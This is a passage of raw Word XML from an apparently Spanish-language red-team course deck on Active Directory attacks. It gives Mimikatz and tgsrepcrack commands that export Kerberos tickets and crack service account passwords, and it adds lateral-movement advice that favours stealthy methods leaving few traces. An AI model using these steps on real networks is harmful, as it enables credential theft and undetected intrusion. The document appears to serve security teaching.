          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1069"/>
        </w:tabs>
        <w:ind w:left="1069"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Comprobar ticket en memoria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47778A41" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="3"/>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98432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05A052E6" wp14:editId="7298FC12">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5420867</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92027</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1036319" cy="338455"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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19" cy="338455"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="29B6432D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="22"/>
                              <w:ind w:left="448"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:w w:val="110"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>klist</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="05A052E6" id="Textbox 524" o:spid="_x0000_s1273" type="#_x0000_t202" style="position:absolute;margin-left:426.85pt;margin-top:7.25pt;width:81.6pt;height:26.65pt;z-index:-1561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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="29B6432D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="22"/>
                        <w:ind w:left="448"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:w w:val="110"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>klist</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFB82E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="234"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20498B03" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1069"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1069"/>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98944" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="720B396B" wp14:editId="33A6B9E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3084576</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>404407</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5614670" cy="454659"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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4670" cy="454659"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="24EC8647" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="160"/>
                              <w:ind w:left="302"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz -command '"kerberos::list /export"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="720B396B" id="Textbox 525" o:spid="_x0000_s1274" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:242.9pt;margin-top:31.85pt;width:442.1pt;height:35.8pt;z-index:-1561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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="24EC8647" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="160"/>
                        <w:ind w:left="302"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz -command '"kerberos::list /export"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exportar ticket usando Mimikatz :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4066C4D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="102"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4199276B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1068"/>
        </w:tabs>
        <w:ind w:left="1068" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ahora, descifre la contraseña de la cuenta de servicio usando tgsrepcrack.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A1521" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5963FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5DA1F2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="161"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261AB43B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="49" w:lineRule="exact"/>
        <w:ind w:right="1463"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15840256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E35B7E5" wp14:editId="0DDC86CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2810255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-335395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6571615" cy="368935"/>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1615" cy="368935"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="02833E32" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="85"/>
                              <w:ind w:left="611"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>python.exe .\tgsrepcrack.py .\passwords.txt '.\Ticket.kirbi'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1E35B7E5" id="Textbox 526" o:spid="_x0000_s1275" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:221.3pt;margin-top:-26.4pt;width:517.45pt;height:29.05pt;z-index:1584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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="02833E32" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="85"/>
                        <w:ind w:left="611"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>python.exe .\tgsrepcrack.py .\passwords.txt '.\Ticket.kirbi'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698103D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="49" w:lineRule="exact"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId267"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="100" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157C2E3D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58068E4F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="855"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8E56BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1D1E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId268"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="148"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFD299C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="911"/>
        </w:tabs>
        <w:spacing w:before="47"/>
        <w:ind w:left="911" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Movimiento lateral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A321818" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1631"/>
        </w:tabs>
        <w:spacing w:before="652" w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1631" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El Adversario tratará de moverse lateralmente en el entorno en busca de algún elemento crítico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED32310" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1632"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servidores/Activos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F50E8D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283C2D16" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="97"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279A741E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1631"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1631" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Algunas de las técnicas que se pueden utilizar son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65758B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2351"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2351" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Comunicación remota de PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B3CC0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2351"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2351" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instrumental de administración de Windows (WMI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3650E9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2351"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2351" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-Mimikatz.ps1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27CAFF92" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BB4082" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="177"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A6851A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1632"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1632" w:right="584"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se aconseja elegir un método que sea sigiloso y que casi no deje huellas en NINGUNA máquina a la que apunte el Adversario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D3A65" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="640" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC60997" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="576" w:lineRule="exact"/>
        <w:ind w:left="546"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt; PowerShell Comunicación remota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A919D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
